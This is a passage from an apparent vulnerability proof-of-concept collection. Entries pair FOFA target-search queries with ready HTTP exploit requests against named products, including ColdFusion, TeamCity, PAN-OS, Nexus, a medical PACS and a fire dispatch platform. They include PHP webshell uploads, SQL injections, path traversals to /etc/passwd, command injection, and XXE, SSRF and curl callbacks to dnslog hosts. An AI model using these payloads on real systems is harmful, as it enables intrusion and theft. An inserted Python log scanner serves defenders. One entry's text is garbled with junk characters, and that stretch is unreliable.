Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立迅) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. Weak password in the CMSV6 vehicle monitoring platform
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

* H& v+ n4 h% a& M/ }144. D-Link nas_sharing.cgi 命令注入+ y3 V$ b% k1 Q. [, ?+ {' [
FOFA:app="D_Link-DNS-ShareCenter"
4 `9 q% N; M& [1 Lsystem参数用于传要执行的命令
, |  e) u5 E) C/ M# t: Q  L8 UGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
2 B& z) S0 r& n* X) H- EHost: x.x.x.x8 C& u3 H5 L* C& C+ m. M
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0, t* e! x) N- `( q
Connection: close
& e' Q9 I9 i& j. ?6 O9 g% VAccept: */*8 m  `3 I/ A8 V5 ]+ j9 G$ ~
Accept-Language: en
( t8 [5 m0 x2 OAccept-Encoding: gzip: y; c# D* F+ w$ e8 P% I* }
2 M* g" C4 z* h3 a2 |9 l+ N7 l# @+ ^
$ C) @/ f& O7 H7 L* x+ b& T  F
145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

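Entries 126, 129, 132, 147 and 149 to 151 above all reach their target by manipulating the request path: ".." segments against a file-serving handler (aiohttp /static, RaidenMAILD /webeditor, the ColdFusion file_name parameter), or a ";" path parameter (";swagger-ui/", ";.jsp") that makes the application route a protected endpoint as if it were a permitted static resource. The following Python is an added example for defenders, not code from this post or from any of the products listed: it normalises the request target of access-log lines the way a lenient servlet container would (percent-decoding, stripping path parameters, resolving dot segments) and flags those shapes, so existing logs can be checked for past exposure. The log lines are constructed for the example and the function names normalize_path, analyze_target and scan_log are my own.

```python
"""Scan web-server access-log lines for the request-path tricks seen in the
entries above.  A lenient servlet container percent-decodes the path, strips
';param' from each segment and resolves '..' before dispatching, so detection
must do the same and judge what the request resolves to, not the raw string.
Sample log lines are constructed at the bottom of the block."""
import re
from urllib.parse import unquote

# Combined log format: the quoted request line carries method and target.
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# Files read by the traversal entries above; extend for your own estate.
_SENSITIVE_RE = re.compile(r'(?:^|/)(?:etc/passwd|windows/win\.ini)$', re.IGNORECASE)


def normalize_path(raw_path):
    """Return (clean_path, findings) for one path or path-like value.

    clean_path is percent-decoded (twice, to catch double encoding), has
    ';...' stripped from every segment and '.'/'..' resolved; findings lists
    the tricks observed on the way."""
    findings = []
    decoded = unquote(unquote(raw_path))
    if decoded != raw_path:
        findings.append('percent-encoded path characters')
    clean = []
    for seg in decoded.split('/'):
        if ';' in seg:
            seg, param = seg.split(';', 1)
            # ';jsessionid=...' is ordinary Java session tracking; any other
            # path parameter (';swagger-ui/', ';.jsp') is the bypass shape.
            if not param.lower().startswith('jsessionid='):
                findings.append('path parameter ;%s' % param)
        if seg == '' and clean:          # collapse '//' and a trailing '/'
            continue
        if seg == '..':
            findings.append('dot-segment traversal')
            if clean and clean[-1] != '':   # never climb above the root marker
                clean.pop()
            continue
        if seg == '.':
            continue
        clean.append(seg)
    return '/'.join(clean) or '/', findings


def analyze_target(raw_target):
    """Normalise the path and every path-like query value of a request target.

    Forwarding parameters (jsp= and file_name= in the entries above) carry the
    same tricks as the path itself, so they get the same treatment."""
    path, _, query = raw_target.partition('?')
    clean_path, findings = normalize_path(path)
    if _SENSITIVE_RE.search(clean_path):
        findings.append('resolves to sensitive file %s' % clean_path)
    for pair in query.split('&') if query else []:
        key, _, value = pair.partition('=')
        probe = unquote(unquote(value))
        if '/' not in probe and '..' not in probe:
            continue
        clean_value, value_findings = normalize_path(value)
        findings.extend('%s (query parameter %s)' % (f, key) for f in value_findings)
        if _SENSITIVE_RE.search(clean_value):
            findings.append('query parameter %s resolves to %s' % (key, clean_value))
    # De-duplicate while keeping order, so a run of '..' is reported once.
    return clean_path, list(dict.fromkeys(findings))


def scan_log(lines):
    """Return one record per log line whose request target shows a trick."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = _REQ_RE.search(line)
        if not match:
            continue
        clean_path, findings = analyze_target(match.group('target'))
        if findings:
            hits.append({'line': number, 'method': match.group('method'),
                         'target': match.group('target'),
                         'clean_path': clean_path, 'findings': findings})
    return hits


# Constructed sample log: one benign request, requests shaped like entries
# 149/150, 126, 132, 129, 147 and 151, then a legitimate ';jsessionid' request.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:10:01:02 +0800] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [05/Jun/2024:10:01:09 +0800] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 88',
    '10.0.0.7 - - [05/Jun/2024:10:01:15 +0800] "GET /static/../../../../../etc/passwd HTTP/1.1" 200 1401',
    '10.0.0.9 - - [05/Jun/2024:10:02:01 +0800] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 640',
    '10.0.0.9 - - [05/Jun/2024:10:02:30 +0800] "GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1" 200 1401',
    '10.0.0.9 - - [05/Jun/2024:10:03:00 +0800] "GET /webeditor/..%2f..%2f..%2fwindows/win.ini HTTP/1.1" 200 92',
    '10.0.0.9 - - [05/Jun/2024:10:03:10 +0800] "GET /;swagger-ui/dataSource/pageList?pageNumber=1&pageSize=10 HTTP/1.1" 200 3102',
    '10.0.0.5 - - [05/Jun/2024:10:03:20 +0800] "GET /app/home;jsessionid=9F2A HTTP/1.1" 200 2048',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print('line %(line)d %(method)s %(target)s -> %(clean_path)s' % hit)
        for finding in hit['findings']:
            print('    ' + finding)
```

To use it on real data, feed scan_log the lines of an access log and pull the full request for any hit whose clean_path or query value resolves to a sensitive file, or whose path parameter is anything other than jsessionid. The normaliser deliberately errs towards over-reporting; tune the sensitive-file pattern and the jsessionid exemption to the application in front of it.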
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the contents of /etc/passwd written to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip


157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--


http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1


159. 英飞达 (INFINITT) medical imaging PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>


/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")


160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>


http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
